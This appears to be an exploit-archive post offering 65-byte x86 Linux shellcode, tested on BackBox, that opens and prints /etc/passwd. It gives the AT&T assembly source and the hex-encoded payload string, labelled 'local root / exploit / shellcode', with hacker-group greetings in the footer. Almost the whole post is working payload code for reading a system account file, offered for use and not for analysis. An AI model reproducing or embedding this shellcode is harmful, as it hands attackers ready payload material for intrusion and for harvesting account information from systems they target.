#Title : Backbox /etc/passwd read shellcode 65 byte(s)
#Author : TrOoN
#E-mail : www.facebook.com/fysl.fyslm
#Home : city 617 logt Draria algeria
#Web Site : www.1337day.com
#Type : local root / exploit / shellcode / etc
#Tested on : backbox 32 bit ENG
#download link : backbox.org
#1337Day sys : it's work withe me 2 time(s) and aft this i get error shut system :P
#~~~~~~~~# hasbin rohkom khirmana 9a3din gir f 9dime yakhii 3bade pff 9wdoo # ~~~~~~~~#
// start delt this ok !!//
_start:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
jmp two
// delt this oK !! ///
one:
pop %ebx
movb $5, %al
xor %ecx, %ecx
int $0x80
mov %eax, %esi
jmp read
exit:
movb $1, %al
xor %ebx, %ebx
int $0x80
read:
mov %esi, %ebx
movb $3, %al
sub $1, %esp
lea (%esp), %ecx
movb $1, %dl
int $0x80
xor %ebx, %ebx
cmp %eax, %ebx
je exit
movb $4, %al
movb $1, %bl
movb $1, %dl
int $0x80
add $1, %esp
jmp read
two:
call one
.string "file_name"
*/
char main[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"
"\xff"
"/etc/passwd";
~~~~~~~~~~~~~~~~ 1337 day | ked ans | ALgerian | mosta_team |viper| bRsco_Dz | fire_hacker| hacker_1420 | &all
metasploit | Back track | w3schoOL | AlGerian_ | bem 2012 anchalah khoya ~~~~~~
